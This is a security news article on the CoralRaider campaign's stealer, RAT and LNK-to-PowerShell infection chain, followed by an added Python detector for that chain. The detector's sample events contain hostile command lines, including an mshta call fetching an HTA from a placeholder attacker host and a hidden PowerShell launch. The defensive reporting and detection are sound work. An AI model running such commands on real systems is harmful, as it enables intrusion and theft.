Thursday, December 12, 2024
CoralRaider Hackers Steal Login Credentials, Financial Data & Social Media Logins


A new threat actor dubbed “CoralRaider” targets victims’ financial information, login credentials, and social media profiles—including accounts for businesses and advertisements.

The group, which is of Vietnamese origin, has been active since at least 2023 and targets victims in several Asian and Southeast Asian countries. 

In the recent campaign, the attackers used XClient stealer and RotBot, a customized version of QuasarRAT, as payloads.

RotBot, a remote access tool (RAT), runs several checks on the victim’s computer to evade detection, including checks of the machine’s IP address, ASN, and running processes. 

The XClient stealer offers significant information-stealing capabilities due to its plugin module and a variety of modules for conducting remote administration operations.

Notable Tactics, Techniques, And Procedures (TTPs) Employed

According to Cisco Talos reports, the attacker utilized two Telegram bots: a “debug” bot for debugging and an “online” bot for receiving victim data. 

However, the “debug” bot’s desktop image and Telegram profile looked identical to those of the “online” bot.

This suggests that the actor may have infected their own environment while testing the bot. 

Telegram bots used by attackers

Researchers’ investigation turned up two more pictures that showed several OneDrive folders. 

An Excel file that most likely contained the victims’ data was examined in another picture. The spreadsheet contains multiple tabs in Vietnamese. 

“CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer”, Talos researchers shared with Cyber Security News.

“The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration”.

This malicious campaign is aimed at victims in South Korea, Bangladesh, Pakistan, Indonesia, Vietnam, India, China, and other countries in Asia and Southeast Asia. 

A Windows shortcut (LNK) file serves as the campaign’s initial vector. The actor’s method of delivering the LNK files to victims is currently unknown.

Attack Flow

A malicious Windows shortcut file that downloads and launches an HTML application file (HTA) from a download site under the attacker’s control is the first step in the attack.

An embedded, obfuscated Visual Basic script runs when the HTA file is opened.

The malicious Visual Basic script loads a PowerShell script in memory; that script decrypts and sequentially runs three further PowerShell scripts that download and launch RotBot, disable Windows and application notifications, bypass User Account Control (UAC), and perform anti-VM and anti-analysis checks. 

On the victim’s computer, RotBot is downloaded and launched under the guise of the Printer Subsystem program “spoolsv.exe.” The threat actor has assembled and customized a RotBot specifically for this campaign. 

The XClient stealer steals victims’ browser data, credit card numbers, and social network login credentials.

It locates the data files of the Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browsers using the absolute paths derived from each browser’s installation path. 

Lastly, the XClient stealer collects the victim’s social media information into a text file in the local user profile’s temporary folder and packages it into a ZIP archive.
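As an added illustration (not code from the article or from Cisco Talos), the detector below flags the three process-creation stages of the chain described above: mshta.exe fetching a remote HTA, PowerShell spawned by mshta.exe, and a binary named spoolsv.exe running from outside System32. The event records are constructed here in the shape of Sysmon Event ID 1 fields; the paths and command lines are illustrative.

```python
# Added example, not from the article: a minimal rule-based detector for the
# CoralRaider execution chain, run over constructed process-creation events.
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # full path of the newly created process
    parent: str   # full path of the parent process
    cmdline: str  # command line of the new process


# The legitimate Print Spooler lives only here; any other spoolsv.exe is suspect.
LEGIT_SPOOLSV = r"c:\windows\system32\spoolsv.exe"


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules the event matches (empty list = benign)."""
    hits = []
    image = ev.image.lower()
    parent = ev.parent.lower()
    cmd = ev.cmdline.lower()
    # Stage 1: the LNK launches mshta.exe with a remote HTA URL on the command line.
    if image.endswith("\\mshta.exe") and "http" in cmd:
        hits.append("mshta_remote_hta")
    # Stage 2: the HTA's VBScript spawns PowerShell (typically hidden).
    if parent.endswith("\\mshta.exe") and image.endswith("\\powershell.exe"):
        hits.append("mshta_spawns_powershell")
    # Stage 3: RotBot masquerading as spoolsv.exe from a non-system path.
    if image.endswith("\\spoolsv.exe") and image != LEGIT_SPOOLSV:
        hits.append("spoolsv_masquerade")
    return hits


# Constructed sample events; the hostname is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta.exe http://attacker-host.example/update.hta"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe", "powershell -w hidden -ep bypass"),
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\spoolsv.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "spoolsv.exe"),
    ProcEvent(r"C:\Windows\System32\spoolsv.exe",
              r"C:\Windows\System32\services.exe", "spoolsv.exe"),  # benign spooler
]


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, matched rules) for every event that matches at least one rule."""
    return [(e.image, classify(e)) for e in events if classify(e)]
```

The same three rules can be expressed as a Sysmon or SIEM query; the point is that each stage is visible in parent/child process relationships and binary paths, not in the payload content.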

Use secure passwords and change them frequently to protect yourself from these dangerous attacks.

Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.